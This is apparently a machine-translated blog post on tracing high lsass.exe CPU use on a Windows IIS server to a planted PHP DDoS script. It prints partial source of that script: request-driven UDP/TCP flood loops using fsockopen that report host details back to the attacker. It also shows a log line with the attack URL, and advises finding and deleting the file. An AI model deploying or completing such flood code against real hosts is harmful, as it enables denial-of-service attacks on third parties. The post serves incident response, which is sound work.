The lsass.exe process CPU usage exception troubleshooting method on the Windows server
- 2020-05-12 06:32:33
- OfStack
lsass.exe occupies CPU too high, which is not too high, and it will return to normal after a period of time. CPU is too high, which directly causes the website to open slowly and repeatedly week by week.
When CPU was running high, along with a current image, it was the floating of the network. Sometimes, the upload even reached 30M-90M /s. When it came to external attacks, I thought it might be this reason at the first time.
Common external documents, this thing online search 1 can be found.
<?php
set_time_limit(86400);
ignore_user_abort(True);
$packets = 0;
$http = $_REQUEST['http'];
$rand = $_REQUEST['exit'];
$exec_time = $_REQUEST['time'];
........
echo $_REQUEST['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_REQUEST['rat'];
exit;
}
echo "Php 2012 Terminator";
exit;
}
for($i=0;$i<65535;$i++)
{
$out .= "X";
}
/........
}
$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
if($rand==500)
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
?>
So how do you figure out which station it is?
You can open the log
C: \ Windows \ System32 \ LogFiles \ HTTPERR \ httperr... log, open today's time file,
There are notes like this:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1The last three items are 783 Disabled 30_FreeHost_1
So 783 is this ID in IIS
30_FreeHost_1 is the pool
Solutions:
Find this site, and then want to solve it, if the conditions allow, you can directly disable the fsockopen function, of course, this is not applicable in most cases.
Check out the site's root check.
$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);With the help of some tools, you can find the above sentence, or find $fp = fsockopen, so that the attack file on the local file is not hidden, of course, do not delete the normal mail sending file, and finally restart the service, well, no card.